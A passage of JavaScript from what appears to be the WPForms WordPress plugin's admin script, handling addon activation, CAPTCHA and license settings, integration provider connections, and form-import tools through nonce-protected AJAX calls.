		// eslint-disable-next-line max-lines-per-function,complexity
		addonToggle( $btn ) {
			let state,
				cssClass,
				stateText,
				buttonText,
				errorText,
				successText;

			if ( $btn.hasClass( 'status-go-to-url' ) ) {
				// Open url in new tab.
				window.open( $btn.attr( 'data-plugin' ), '_blank' );
				return;
			}

			$btn.prop( 'disabled', true ).addClass( 'loading' );
			$btn.html( s.iconSpinner );

			const pluginType = $btn.attr( 'data-type' );

			if ( $btn.hasClass( 'status-active' ) ) {
				// Deactivate.
				state = 'deactivate';
				cssClass = 'status-installed';
				if ( pluginType === 'plugin' ) {
					cssClass += ' button button-secondary';
				}
				stateText = wpforms_admin.addon_inactive;
				buttonText = wpforms_admin.addon_activate;
				errorText = wpforms_admin.addon_deactivate;
				if ( pluginType === 'addon' ) {
					buttonText = s.iconActivate + buttonText;
					errorText = s.iconDeactivate + errorText;
				}
			} else if ( $btn.hasClass( 'status-installed' ) ) {
				// Activate.
				state = 'activate';
				cssClass = 'status-active';
				if ( pluginType === 'plugin' ) {
					cssClass += ' button button-secondary disabled';
				}
				stateText = wpforms_admin.addon_active;
				buttonText = wpforms_admin.addon_deactivate;
				if ( pluginType === 'addon' ) {
					buttonText = s.iconDeactivate + buttonText;
					errorText = s.iconActivate + wpforms_admin.addon_activate;
				} else if ( pluginType === 'plugin' ) {
					buttonText = wpforms_admin.addon_activated;
					errorText = wpforms_admin.addon_activate;
				}
			} else if ( $btn.hasClass( 'status-missing' ) ) {
				// Install & Activate.
				state = 'install';
				cssClass = 'status-active';
				if ( pluginType === 'plugin' ) {
					cssClass += ' button disabled';
				}
				stateText = wpforms_admin.addon_active;
				buttonText = wpforms_admin.addon_activated;
				errorText = s.iconInstall;
				if ( pluginType === 'addon' ) {
					buttonText = s.iconActivate + wpforms_admin.addon_deactivate;
					errorText += wpforms_admin.addon_install;
				}
			} else {
				return;
			}

			const plugin = $btn.attr( 'data-plugin' );

			// eslint-disable-next-line complexity
			WPFormsAdmin.setAddonState( plugin, state, pluginType, function( res ) {
				const $addon = $btn.closest( '.addon-item' );

				if ( res.success ) {
					if ( 'install' === state ) {
						$btn.attr( 'data-plugin', res.data.basename );
						successText = res.data.msg;
						if ( ! res.data.is_activated ) {
							stateText = wpforms_admin.addon_inactive;
							buttonText = 'plugin' === pluginType ? wpforms_admin.addon_activate : s.iconActivate + wpforms_admin.addon_activate;
							cssClass = 'plugin' === pluginType ? 'status-installed button button-secondary' : 'status-installed';
						}
					} else {
						successText = res.data;
					}
					$addon.find( '.actions' ).append( '<div class="msg success">' + successText + '</div>' );
					$addon.find( 'span.status-label' )
						.removeClass( 'status-active status-installed status-missing' )
						.addClass( cssClass )
						.removeClass( 'button button-primary button-secondary disabled' )
						.text( stateText );
					$btn
						.removeClass( 'status-active status-installed status-missing' )
						.removeClass( 'button button-primary button-secondary disabled' )
						.addClass( cssClass ).html( buttonText );
				} else {
					if ( 'object' === typeof res.data ) {
						if ( pluginType === 'addon' ) {
							$addon.find( '.actions' ).append( '<div class="msg error"><p>' + wpforms_admin.addon_error + '</p></div>' );
						} else {
							$addon.find( '.actions' ).append( '<div class="msg error"><p>' + wpforms_admin.plugin_error + '</p></div>' );
						}
					} else {
						$addon.find( '.actions' ).append( '<div class="msg error"><p>' + res.data + '</p></div>' );
					}
					if ( 'install' === state && 'plugin' === pluginType ) {
						$btn.addClass( 'status-go-to-url' ).removeClass( 'status-missing' );
					}
					$btn.html( errorText );
				}

				$btn.prop( 'disabled', false ).removeClass( 'loading' );

				if ( ! $addon.find( '.actions' ).find( '.msg.error' ).length ) {
					setTimeout( function() {
						$( '.addon-item .msg' ).remove();
					}, 3000 );
				}
			},
			function( error ) {
				// eslint-disable-next-line no-console
				console.log( error.responseText );
			} );
		},

		//--------------------------------------------------------------------//
		// Settings.
		//--------------------------------------------------------------------//
		/**
		 * Element bindings for Settings page.
		 *
		 * @since 1.3.9
		 */
		initSettings() { // eslint-disable-line max-lines-per-function
			// On ready events.
			$( document ).on( 'wpformsReady', function() { // eslint-disable-line max-lines-per-function
				// Only proceed if we're on the settings page.
				if ( ! $( '#wpforms-settings' ).length ) {
					return;
				}

				// Watch for hashes and scroll to if found.
				// Display all addon boxes as the same height.
				const integrationFocus = WPFormsAdmin.getQueryString( 'wpforms-integration' ),
					jumpTo = WPFormsAdmin.getQueryString( 'jump' );

				if ( integrationFocus ) {
					$( 'body' ).animate(
						{ scrollTop: $( '#wpforms-integration-' + integrationFocus ).offset().top },
						1000
					);
				} else if ( jumpTo ) {
					$( 'body' ).animate(
						{ scrollTop: $( '#' + jumpTo ).offset().top },
						1000
					);
				}

				// Settings conditional logic.
				$( '.wpforms-admin-settings-form' ).conditions( [

					// Misc > Disable User Cookies visibility.
					{
						conditions: {
							element:  '#wpforms-setting-gdpr',
							type:     'checked',
							operator: 'is',
						},
						actions: {
							if: {
								element: '#wpforms-setting-row-gdpr-disable-uuid,#wpforms-setting-row-gdpr-disable-details',
								action:	 'show',
							},
							else : {
								element: '#wpforms-setting-row-gdpr-disable-uuid,#wpforms-setting-row-gdpr-disable-details',
								action:	 'hide',
							},
						},
						effect: 'appear',
					},

					// CAPTCHA > Type.
					{
						conditions: {
							element:   'input[name=captcha-provider]:checked',
							type:      'value',
							operator:  '=',
							condition: 'hcaptcha',
						},
						actions: {
							if: [
								{
									element: '.wpforms-setting-row',
									action: 'show',
								},
								{
									element: '.wpforms-setting-recaptcha, #wpforms-setting-row-recaptcha-site-key, #wpforms-setting-row-recaptcha-secret-key, #wpforms-setting-row-recaptcha-fail-msg, .wpforms-setting-turnstile, #wpforms-setting-row-turnstile-heading, #wpforms-setting-row-turnstile-site-key, #wpforms-setting-row-turnstile-secret-key, #wpforms-setting-row-turnstile-theme, #wpforms-setting-row-turnstile-fail-msg',
									action: 'hide',
								},
							],
						},
						effect: 'appear',
					},
					{
						conditions: {
							element:   'input[name=captcha-provider]:checked',
							type:      'value',
							operator:  '=',
							condition: 'recaptcha',
						},
						actions: {
							if: [
								{
									element: '.wpforms-setting-row',
									action: 'show',
								},
								{
									element: '#wpforms-setting-row-hcaptcha-heading, #wpforms-setting-row-hcaptcha-site-key, #wpforms-setting-row-hcaptcha-secret-key, #wpforms-setting-row-hcaptcha-fail-msg, #wpforms-setting-row-turnstile-heading, #wpforms-setting-row-turnstile-site-key, #wpforms-setting-row-turnstile-secret-key, #wpforms-setting-row-turnstile-theme, #wpforms-setting-row-turnstile-fail-msg',
									action: 'hide',
								},
							],
						},
						effect: 'appear',
					},
					{
						conditions: {
							element:   'input[name=captcha-provider]:checked',
							type:      'value',
							operator:  '=',
							condition: 'turnstile',
						},
						actions: {
							if: [
								{
									element: '.wpforms-setting-row',
									action: 'show',
								},
								{
									element: '#wpforms-setting-row-hcaptcha-heading, #wpforms-setting-row-hcaptcha-site-key, #wpforms-setting-row-hcaptcha-secret-key, #wpforms-setting-row-hcaptcha-fail-msg, .wpforms-setting-recaptcha, #wpforms-setting-row-recaptcha-site-key, #wpforms-setting-row-recaptcha-secret-key, #wpforms-setting-row-recaptcha-fail-msg',
									action: 'hide',
								},
							],
						},
						effect: 'appear',
					},
					{
						conditions: {
							element:   'input[name=captcha-provider]:checked',
							type:      'value',
							operator:  '=',
							condition: 'none',
						},
						actions: {
							if: [
								{
									element: '.wpforms-setting-row',
									action: 'hide',
								},
								{
									element: '.wpforms-setting-captcha-heading, #wpforms-setting-row-captcha-provider',
									action: 'show',
								},
							],
						},
						effect: 'appear',
					},
				] );
			} );

			// Render engine setting.
			$( document ).on( 'change', '#wpforms-setting-row-render-engine input', WPFormsAdmin.settingsRenderEngineChange );

			// Form styles plugin setting.
			$( document ).on( 'change', '#wpforms-setting-disable-css', function() {
				WPFormsAdmin.settingsFormStylesAlert( $( this ).val() );
			} );

			// Image upload fields.
			$( document ).on( 'click', '.wpforms-setting-row-image button', function( event ) {
				event.preventDefault();

				// If the remove button was clicked, clear the value and remove the image.
				if ( $( this ).hasClass( 'wpforms-setting-remove-image' ) ) {
					const $wrapper = $( this ).closest( '.wpforms-setting-row-image' );
					$wrapper.find( 'input' ).val( '' ).attr( 'value', '' ).trigger( 'change' ).end().find( 'img' ).remove();

					return;
				}

				WPFormsAdmin.imageUploadModal( $( this ) );
			} );

			// Verify license key.
			$( document ).on( 'click', '#wpforms-setting-license-key-verify', function( event ) {
				event.preventDefault();

				WPFormsAdmin.licenseVerify( $( this ) );
			} );

			// Show a message for license field.
			$( document ).on( 'click', '.wpforms-setting-license-wrapper', function( event ) {
				event.preventDefault();

				const $keyField = $( '#wpforms-setting-license-key' );

				if ( ! $keyField.length ) {
					return;
				}

				if ( ! $keyField.prop( 'disabled' ) ) {
					return;
				}

				WPFormsAdmin.licenseEditMessage();
			} );

			// Deactivate a license key.
			$( document ).on( 'click', '#wpforms-setting-license-key-deactivate', function( event ) {
				event.preventDefault();

				WPFormsAdmin.licenseDeactivate( $( this ) );
			} );

			// Refresh license key.
			$( document ).on( 'click', '#wpforms-setting-license-key-refresh', function( event ) {
				event.preventDefault();

				WPFormsAdmin.licenseRefresh( $( this ) );
			} );

			/**
			 * @todo Refactor providers settings tab. Code below is legacy.
			 */

			// Integration connect.
			$( document ).on( 'click', '.wpforms-settings-provider-connect', function( event ) {
				event.preventDefault();

				const button = $( this );

				WPFormsAdmin.integrationConnect( button );
			} );

			// Integration account disconnect.
			$( document ).on( 'click', '.wpforms-settings-provider-accounts-list .remove a', function( event ) {
				event.preventDefault();

				WPFormsAdmin.integrationDisconnect( $( this ) );
			} );

			// Integration individual display toggling.
			$( document ).on( 'click', '.wpforms-settings-provider:not(.focus-out) .wpforms-settings-provider-header', function( event ) {
				event.preventDefault();

				const $this = $( this );

				$this
					.parent()
					.find( '.wpforms-settings-provider-accounts' )
					.stop( false, true )
					.slideToggle( '', function() {
						$this.parent().find( '.wpforms-settings-provider-logo i' ).toggleClass( 'fa-chevron-right fa-chevron-down' );
					} );
			} );

			// Integration accounts display toggling.
			$( document ).on( 'click', '.wpforms-settings-provider-accounts-toggle a', function( event ) {
				event.preventDefault();

				const $connectFields = $( this ).parent().next( '.wpforms-settings-provider-accounts-connect' );
				$connectFields.find( 'input[type=text], input[type=password]' ).val( '' );
				$connectFields.stop().slideToggle();
			} );

			// CAPTCHA settings page: type toggling.
			$( document ).on( 'change', '#wpforms-setting-row-captcha-provider input', function() {
				const $preview = $( '#wpforms-setting-row-captcha-preview' );

				if ( this.value === 'hcaptcha' || this.value === 'turnstile' ) {
					$preview.removeClass( 'wpforms-hidden' );
				} else if ( this.value === 'none' ) {
					$preview.addClass( 'wpforms-hidden' );
				} else {
					$( '#wpforms-setting-row-recaptcha-type input:checked' ).trigger( 'change' );
				}

				if ( $preview.find( '.wpforms-captcha-preview' ).length ) {
					$preview.find( '.wpforms-captcha-preview' ).empty();
					$preview.find( '.wpforms-captcha-placeholder' ).removeClass( 'wpforms-hidden' );
				}
			} );

			// CAPTCHA settings page: reCAPTCHA type toggling.
			$( document ).on( 'change', '#wpforms-setting-row-recaptcha-type input', function() {
				$( '#wpforms-setting-row-captcha-preview' ).toggleClass( 'wpforms-hidden', 'v2' !== this.value );
				$( '#wpforms-setting-row-recaptcha-v3-threshold' ).toggleClass( 'wpforms-hidden', 'v3' !== this.value );
			} );

			// Toggle control switch description.
			$( document ).on( 'change', '.wpforms-toggle-control input', function() {
				const $input = $( this ),
					checked = $input.is( ':checked' ),
					state = checked ? 'on' : 'off',
					$field = $input.closest( '.wpforms-setting-field' ),
					$control = $input.closest( '.wpforms-toggle-control' ),
					$status = $control.find( '.wpforms-toggle-control-status' ),
					$descOn = $field.find( '.wpforms-toggle-desc.desc-on' ),
					$descOff = $field.find( '.wpforms-toggle-desc.desc-off' ),
					isDoubleDesc = $descOn.length > 0 && $descOff.length > 0;

				$descOn.toggleClass( 'wpforms-hidden', ! checked && isDoubleDesc );
				$descOff.toggleClass( 'wpforms-hidden', checked && isDoubleDesc );
				$status.html( $status.data( state ) );
			} );
		},

		/**
		 * Render engine setting change event handler.
		 *
		 * @since 1.8.1
		 */
		settingsRenderEngineChange() {
			// noinspection JSUnusedLocalSymbols
			const renderEngine = $( this ).val(); // eslint-disable-line

			// TODO: Add corresponding code that need to be executed on change render engine setting.
		},

		/**
		 * Alert users if they change form styles to something that may give unexpected results.
		 *
		 * @since 1.5.0
		 *
		 * @param {string} value Form Styles value.
		 */
		settingsFormStylesAlert( value ) {
			let msg;

			if ( '2' === value ) {
				msg = wpforms_admin.settings_form_style_base;
			} else if ( '3' === value ) {
				msg = wpforms_admin.settings_form_style_none;
			} else {
				return;
			}

			$.alert( {
				title: wpforms_admin.heads_up,
				content: msg,
				icon: 'fa fa-exclamation-circle',
				type: 'orange',
				buttons: {
					confirm: {
						text: wpforms_admin.ok,
						btnClass: 'btn-confirm',
						keys: [ 'enter' ],
					},
				},
			} );
		},

		/**
		 * Image upload modal window.
		 *
		 * @since 1.3.0
		 *
		 * @param {jQuery} $el Image upload button element.
		 */
		imageUploadModal( $el ) {
			// To prevent caching of the media frame object and
			// avoid confusion between multiple instances,
			// this method no longer relies on the shared s.mediaFrame object.
			// Instead, it creates a new mediaFrame object for each instance.

			const $setting = $el.closest( '.wpforms-setting-field' );

			s.mediaFrame = wpf.initMediaLibrary( {
				title: wpforms_admin.upload_image_title,
				extensions: wpforms_admin.upload_image_extensions,
				extensionsError: wpforms_admin.upload_image_extensions_error,
				buttonText: wpforms_admin.upload_image_button,
			} );

			s.mediaFrame.on( 'select', function() {
				// Grab our attachment selection and construct a JSON representation of the model.
				const mediaAttachment = s.mediaFrame.state().get( 'selection' ).first().toJSON();
				const $input = $setting.find( 'input[type=text]' );

				// Send the attachment URL to our custom input field via jQuery.
				$input.val( mediaAttachment.url );
				$setting.find( 'img' ).remove();
				$setting.prepend( '<img src="' + mediaAttachment.url + '">' );
				$input.trigger( 'change' );
			} ).on( 'close', function() {
				s.mediaFrame.off( 'library:selection:add' );
			} );

			// Now that everything has been set, let's open up the frame.
			s.mediaFrame.open();
		},

		/**
		 * Verify a license key.
		 *
		 * @since 1.3.9
		 *
		 * @param {jQuery} $el Verify button element.
		 */
		licenseVerify( $el ) { // eslint-disable-line max-lines-per-function
			const $row = $el.closest( '.wpforms-setting-row' ),
				$keyField = $( '#wpforms-setting-license-key' ),
				buttonWidth = $el.outerWidth(),
				buttonLabel = $el.text(),
				data = {
					action: 'wpforms_verify_license',
					nonce:   wpforms_admin.nonce,
					license: $keyField.val(),
				};

			$el.html( s.iconSpinner ).css( 'width', buttonWidth ).prop( 'disabled', true );

			$.post( wpforms_admin.ajax_url, data, function( res ) {
				let icon = 'fa fa-check-circle',
					color = 'green',
					msg;

				if ( res.success ) {
					msg = res.data.msg;
					$el.hide();
					$row.find( '#wpforms-setting-license-key-info-message' ).empty().hide();
					$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).show();
					$row.find( '.type strong' ).text( res.data.type );
					$( '.wpforms-license-notice' ).remove();
					$keyField
						.prop( 'disabled', true )
						.addClass( 'wpforms-setting-license-is-valid' )
						.attr( 'value', $keyField.val().replace( /./g, '*' ) );
				} else {
					icon = 'fa fa-exclamation-circle';
					color = 'orange';
					msg = res.data;
					$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).hide();
					$keyField.prop( 'disabled', false );
				}

				$.alert( {
					title: msg.header ?? false,
					content: msg.msg ?? msg,
					icon,
					type: color,
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
						},
					},
				} );

				$el.html( buttonLabel ).css( 'width', 'auto' ).prop( 'disabled', false );
			} ).fail( function( xhr ) {
				$keyField.prop( 'disabled', false );

				// eslint-disable-next-line no-console
				console.log( xhr.responseText );
			} );
		},

		/**
		 * Show a message that license key editing is disabled.
		 *
		 * @since 1.6.5
		 */
		licenseEditMessage() {
			$.alert( {
				title: wpforms_admin.heads_up,
				content: wpforms_admin.edit_license,
				icon: 'fa fa-exclamation-circle',
				type: 'orange',
				buttons: {
					confirm: {
						text: wpforms_admin.ok,
						btnClass: 'btn-confirm',
						keys: [ 'enter' ],
					},
				},
			} );
		},

		/**
		 * Deactivate a license key.
		 *
		 * @since 1.3.9
		 *
		 * @param {Element} el Button element.
		 */
		licenseDeactivate( el ) {
			const $this = $( el );
			const $row = $this.closest( '.wpforms-setting-row' );

			const buttonWidth = $this.outerWidth();
			const buttonLabel = $this.text();

			const data = {
				action: 'wpforms_deactivate_license',
				nonce: wpforms_admin.nonce,
			};

			$this.html( s.iconSpinner ).css( 'width', buttonWidth ).prop( 'disabled', true );

			$.post( wpforms_admin.ajax_url, data, function( res ) {
				let icon = 'fa fa-info-circle';
				let color = 'blue';
				let title = wpforms_admin.success;

				const resData = res.data;
				const msg = ! resData.msg || typeof resData.msg !== 'string' ? wpforms_admin.something_went_wrong : resData.msg;

				if ( res.success ) {
					$row.find( '#wpforms-setting-license-key' )
						.val( '' )
						.attr( 'value', '' )
						.prop( { readonly: false, disabled: false } )
						.removeClass();
					$row.find( '.wpforms-license-key-deactivate-remove' ).remove();
					$row.find( '#wpforms-setting-license-key-info-message' ).html( resData.info ).show();
					$row.find( '#wpforms-setting-license-key-verify' ).prop( 'disabled', false ).show();
					$row.find( '.type, .desc, #wpforms-setting-license-key-deactivate' ).hide();
				} else {
					icon = 'fa fa-exclamation-circle';
					color = 'orange';
					title = wpforms_admin.oops;
				}

				$.alert( {
					title,
					content: msg,
					icon,
					type: color,
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
						},
					},
				} );

				$this.html( buttonLabel ).css( 'width', 'auto' ).prop( 'disabled', false );
			} ).fail( function( xhr ) {
				// eslint-disable-next-line no-console
				console.log( xhr.responseText );
			} );
		},

		/**
		 * Refresh a license key.
		 *
		 * @since 1.3.9
		 *
		 * @param {jQuery} el Element.
		 */
		licenseRefresh( el ) {
			const $this = $( el ),
				$row = $this.closest( '.wpforms-setting-row' ),
				$input = $( '#wpforms-setting-license-key' ),
				data = {
					action: 'wpforms_refresh_license',
					nonce:   wpforms_admin.nonce,
				};

			$.post( wpforms_admin.ajax_url, data, function( res ) {
				let icon = 'fa fa-check-circle',
					color = 'green',
					msg;

				if ( res.success ) {
					msg = res.data.msg;
					$row.find( '.type strong' ).text( res.data.type );
				} else {
					icon = 'fa fa-exclamation-circle';
					color = 'orange';
					msg = res.data;
					$row.find( '.type, .desc' ).hide();
					$input.removeClass( 'wpforms-setting-license-is-valid' ).addClass( 'wpforms-setting-license-is-invalid' );
				}

				$.alert( {
					title: msg.header ?? false,
					content: msg.msg ?? msg,
					icon,
					type: color,
					buttons: {
						confirm: {
							text: wpforms_admin.ok,
							btnClass: 'btn-confirm',
							keys: [ 'enter' ],
						},
					},
				} );
			} ).fail( function( xhr ) {
				// eslint-disable-next-line no-console
				console.log( xhr.responseText );
			} );
		},

		/**
		 * Connect integration provider account.
		 *
		 * @since 1.3.9
		 *
		 * @param {jQuery} $btn Button (.wpforms-settings-provider-connect) that was clicked to establish connection.
		 */
		integrationConnect( $btn ) {
			const buttonWidth = $btn.outerWidth(),
				buttonLabel = $btn.text(),
				$provider = $btn.closest( '.wpforms-settings-provider' ),
				data = {
					action  : 'wpforms_settings_provider_add_' + $btn.data( 'provider' ),
					data    : $btn.closest( 'form' ).serialize(),
					provider: $btn.data( 'provider' ),
					nonce   : wpforms_admin.nonce,
				};
			let errorMessage = wpforms_admin.provider_auth_error;

			$btn.html( wpforms_admin.connecting ).css( 'width', buttonWidth ).prop( 'disabled', true );

			$.post( wpforms_admin.ajax_url, data, function( response ) {
				if ( response.success ) {
					$provider.find( '.wpforms-settings-provider-accounts-list ul' ).append( response.data.html );
					$provider.addClass( 'connected' );
					$btn.closest( '.wpforms-settings-provider-accounts-connect' ).stop().slideToggle();
				} else {
					if (
						Object.prototype.hasOwnProperty.call( response, 'data' ) &&
						Object.prototype.hasOwnProperty.call( response.data, 'error_msg' )
					) {
						errorMessage += '<br>' + response.data.error_msg;
					}

					WPFormsAdmin.integrationError( errorMessage );
				}
			} ).fail( function() {
				WPFormsAdmin.integrationError( errorMessage );
			} ).always( function() {
				$btn.html( buttonLabel ).css( 'width', 'auto' ).prop( 'disabled', false );
			} );
		},

		/**
		 * Remove an integration provider account.
		 *
		 * @since 1.3.9
		 *
		 * @param {Object} el Disconnect link that was clicked to establish removing account.
		 */
		integrationDisconnect( el ) {
			const $this = $( el ),
				$provider = $this.parents( '.wpforms-settings-provider' ),
				data = {
					action  : 'wpforms_settings_provider_disconnect_' + $this.data( 'provider' ),
					provider: $this.data( 'provider' ),
					key     : $this.data( 'key' ),
					nonce   : wpforms_admin.nonce,
				};
			let errorMessage = wpforms_admin.provider_delete_error;

			$.confirm( {
				title: wpforms_admin.heads_up,
				content: wpforms_admin.provider_delete_confirm,
				icon: 'fa fa-exclamation-circle',
				type: 'orange',
				buttons: {
					confirm: {
						text: wpforms_admin.ok,
						btnClass: 'btn-confirm',
						keys: [ 'enter' ],
						action() {
							$.post( wpforms_admin.ajax_url, data, function( response ) {
								if ( response.success ) {
									$this.parent().parent().remove();

									// Hide the Connected status label if no more integrations are linked.
									const numberOfIntegrations = $provider.find( '.wpforms-settings-provider-accounts-list li' ).length;

									if ( typeof numberOfIntegrations === 'undefined' || numberOfIntegrations === 0 ) {
										$provider.removeClass( 'connected' );
									}

									/**
									 * Provider account has been removed.
									 *
									 * @since 1.7.7
									 */
									$( document ).trigger( 'wpformsProviderRemoved', [ $provider, response ] );
								} else {
									if (
										Object.prototype.hasOwnProperty.call( response, 'data' ) &&
										Object.prototype.hasOwnProperty.call( response.data, 'error_msg' )
									) {
										errorMessage += '<br>' + response.data.error_msg;
									}

									WPFormsAdmin.integrationError( errorMessage );
								}
							} ).fail( function() {
								WPFormsAdmin.integrationError( errorMessage );
							} );
						},
					},
					cancel: {
						text: wpforms_admin.cancel,
						keys: [ 'esc' ],
					},
				},
			} );
		},

		/**
		 * Error handling.
		 *
		 * @since 1.6.4
		 *
		 * @param {string} error Error message.
		 */
		integrationError( error ) {
			$.alert( {
				title: wpforms_admin.something_went_wrong,
				content: error,
				icon: 'fa fa-exclamation-circle',
				type: 'orange',
				buttons: {
					confirm: {
						text: wpforms_admin.ok,
						btnClass: 'btn-confirm',
						keys: [ 'enter' ],
					},
				},
			} );
		},

		//--------------------------------------------------------------------//
		// Tools.
		//--------------------------------------------------------------------//

		/**
		 * Element bindings for Tools page.
		 *
		 * @since 1.4.2
		 */
		initTools() { // eslint-disable-line max-lines-per-function
			// Enable import/export buttons when a value is selected.
			$( document ).on( 'change', '#wpforms-tools-form-import, #wpforms-tools-form-other-import, #wpforms-tools-form-export, #wpforms-tools-form-template', function() {
				const $field = $( this );
				const $button = $field.parents( 'form' ).find( 'button' );

				$button.attr( 'aria-disabled', $field.val().length === 0 );
			} );

			// Copy system information to the clipboard.
			$( document ).on( 'click', '#wpforms-system-information-copy', function( event ) {
				event.preventDefault();
				WPFormsAdmin.copySystemInformation();
			} );

			// Run SSL test.
			$( document ).on( 'click', '#wpforms-ssl-verify', function( event ) {
				event.preventDefault();
				WPFormsAdmin.verifySSLConnection();
			} );

			// Recreate database tables.
			$( document ).on( 'click', '#wpforms-recreate-tables', function( event ) {
				event.preventDefault();
				WPFormsAdmin.recreateTables();
			} );

			// Run import for a specific provider.
			$( document ).on( 'click', '#wpforms-importer-forms-submit', function( event ) {
				event.preventDefault();

				// Check to confirm the user as selected a form.
				const $checked = $( '#wpforms-importer-forms input:checked' );

				if ( $checked.length ) {
					const ids = [];

					$checked.each( function( i ) {
						ids[ i ] = $( this ).val();
					} );

					if ( ! wpforms_admin.isPro ) {
						// We need to analyze the forms before starting the actual import.
						WPFormsAdmin.analyzeForms( ids );
					} else {
						// Begin the import process.
						WPFormsAdmin.importForms( ids );
					}
				} else {
					// User didn't select a form so alert them.
					$.alert( {
						title: wpforms_admin.heads_up,
						content: wpforms_admin.importer_forms_required,
						icon: 'fa fa-info-circle',
						type: 'blue',
						buttons: {
							confirm: {
								text: wpforms_admin.ok,
								btnClass: 'btn-confirm',
								keys: [ 'enter' ],
							},
						},
					} );
				}
			} );

			// Continue import after analyzing.
			$( document ).on( 'click', '#wpforms-importer-continue-submit', function( event ) {
				event.preventDefault();
				WPFormsAdmin.importForms( s.formIDs );
			} );
		},

		/**
		 * Copy system information to the clipboard.
		 *
		 * @since 1.8.4
		 */
		copySystemInformation() {
			$( '#wpforms-system-information' ).select();
			document.execCommand( 'copy' );
		},

		/**
		 * Perform a test connection to verify that the current web host
		 * can successfully make outbound SSL connections.
		 *
		 * @since 1.4.5
		 */
		verifySSLConnection() {
			const $btn = $( '#wpforms-ssl-verify' );
			const btnLabel = $btn.text();
			const btnWidth = $btn.outerWidth();
			const $settings = $btn.parent();

			$btn.css( 'width', btnWidth ).prop( 'disabled', true ).text( wpforms_admin.testing );

			const data = {
				action: 'wpforms_verify_ssl',
				nonce:   wpforms_admin.nonce,
			};

			// Trigger AJAX to test connection
			$.post( wpforms_admin.ajax_url, data, function( res ) {
				WPFormsAdmin.debug( res );

				// Remove any previous alerts.
				$settings.find( '.wpforms-notice' ).remove();

				if ( res.success ) {
					$btn.before( '<div class="notice wpforms-notice notice-success">' + res.data.msg + '</div>' );
				}

				if ( ! res.success && res.data.msg ) {
					$btn.before( '<div class="notice wpforms-notice notice-error">' + res.data.msg + '</div>' );
				}

				if ( ! res.success && res.data.debug ) {
					$btn.before( '<div class="wpforms-ssl-error pre-error">' + res.data.debug + '</div>' );
				}

				$btn.css( 'width', btnWidth ).prop( 'disabled', false ).text( btnLabel );
			} );
		},

		/**
		 * Recreate custom tables.
		 *
		 * @since 1.9.0
		 */
		recreateTables() {
			const $btn = $( '#wpforms-recreate-tables' );
			const btnLabel = $btn.text();
			const btnWidth = $btn.outerWidth();
			const $settings = $btn.parent();

			$btn.css( 'width', btnWidth ).prop( 'disabled', true ).text( wpforms_admin.recreating );

			const data = {
				action: 'wpforms_recreate_tables',
				nonce:   wpforms_admin.nonce,
			};

			// Trigger AJAX to recreate tables.
			$.post( wpforms_admin.ajax_url, data, function( res ) {
				WPFormsAdmin.debug( res );

				// Remove any previous alerts.
				$settings.find( '.wpforms-notice' ).remove();

				if ( res.success ) {
					$btn.before( '<div class="notice wpforms-notice notice-success">' + res.data.msg + '</div>' );
					$btn.hide();
				}

				if ( ! res.success && res.data.msg ) {
					$btn.before( '<div class="notice wpforms-notice notice-error">' + res.data.msg + '</div>' );
				}

				if ( ! res.success && res.data.debug ) {
					$btn.before( '<div class="wpforms-ssl-error pre-error">' + res.data.debug + '</div>' );
				}
			} ).always( function() {
				$btn.css( 'width', btnWidth ).prop( 'disabled', false ).text( btnLabel );
			} );
		},

		/**
		 * Begins the process of analyzing the forms.
		 *
		 * This runs for non-Pro installs to check if any of the forms to be imported
		 * contain fields not currently available.
		 *
		 * @since 1.4.2
		 *
		 * @param {Array} forms Forms.
		 */
		analyzeForms( forms ) {
			const $processAnalyze = $( '#wpforms-importer-analyze' );

			// Display the total number of forms we have to import.
			$processAnalyze.find( '.form-total' ).text( forms.length );
			$processAnalyze.find( '.form-current' ).text( '1' );

			// Hide the form select section.
			$( '#wpforms-importer-forms' ).hide();

			// Show Analyze status.
			$processAnalyze.show();

			// Create global analyze queue.
			s.analyzeQueue = forms;
			s.analyzed = 0;
			s.analyzeUpgrade = [];
			s.formIDs = forms;

			// Analyze the first form in the queue.
			WPFormsAdmin.analyzeForm();
		},

		/**
		 * Analyze a single form from the queue.
		 *
		 * @since 1.4.2
		 */
		analyzeForm() {
			const $analyzeSettings = $( '#wpforms-importer-analyze' ),
				formID = _.first( s.analyzeQueue ),
				provider = WPFormsAdmin.getQueryString( 'provider' ),
				data = {
					action:  'wpforms_import_form_' + provider,
					analyze: 1,
					form_id: formID,
					nonce:   wpforms_admin.nonce,
				};

			// Trigger AJAX analyze for this form.
			$.post( wpforms_admin.ajax_url, data, function( res ) {
				if ( res.success ) {
					if ( ! _.isEmpty( res.data.upgrade_plain ) || ! _.isEmpty( res.data.upgrade_omit ) ) {
						s.analyzeUpgrade.push( {
							name:   res.data.name,
							fields: _.union( res.data.upgrade_omit, res.data.upgrade_plain ),
						} );
					}

					// Remove this form ID from the queue.
					s.analyzeQueue = _.without( s.analyzeQueue, formID );
					s.analyzed++;

					if ( _.isEmpty( s.analyzeQueue ) ) {
						if ( _.isEmpty( s.analyzeUpgrade ) ) {
							// Continue to import forms as no Pro fields were found.
							WPFormsAdmin.importForms( s.formIDs );
						} else {
							// We found Pro fields, so alert the user.
							const upgradeDetails = wp.template( 'wpforms-importer-upgrade' );
							$analyzeSettings.find( '.upgrade' ).append( upgradeDetails( s.analyzeUpgrade ) );
							$analyzeSettings.find( '.upgrade' ).show();
							$analyzeSettings.find( '.process-analyze' ).hide();
						}
					} else {
						// Analyze the next form in the queue.
						$analyzeSettings.find( '.form-current' ).text( s.analyzed + 1 );
						WPFormsAdmin.analyzeForm();
					}
				}
			} );
		},

		/**
		 * Begins the process of importing the forms.
		 *
		 * @since 1.4.2
		 *
		 * @param {Array} forms Forms.
		 */
		importForms( forms ) {
			const $processSettings = $( '#wpforms-importer-process' );

			// Display the total number of forms we have to import.
			$processSettings.find( '.form-total' ).text( forms.length );
			$processSettings.find( '.form-current' ).text( '1' );

			// Hide the form select and form analyze sections.
			$( '#wpforms-importer-forms, #wpforms-importer-analyze' ).hide();

			// Show processing status.
			$processSettings.show();

			// Create global import queue.
			s.importQueue = forms;
			s.imported = 0;

			// Import the first form in the queue.
			WPFormsAdmin.importForm();
		},

		/**
		 * Imports a single form from the import queue.
		 *
		 * @since 1.4.2
		 */
		importForm() {
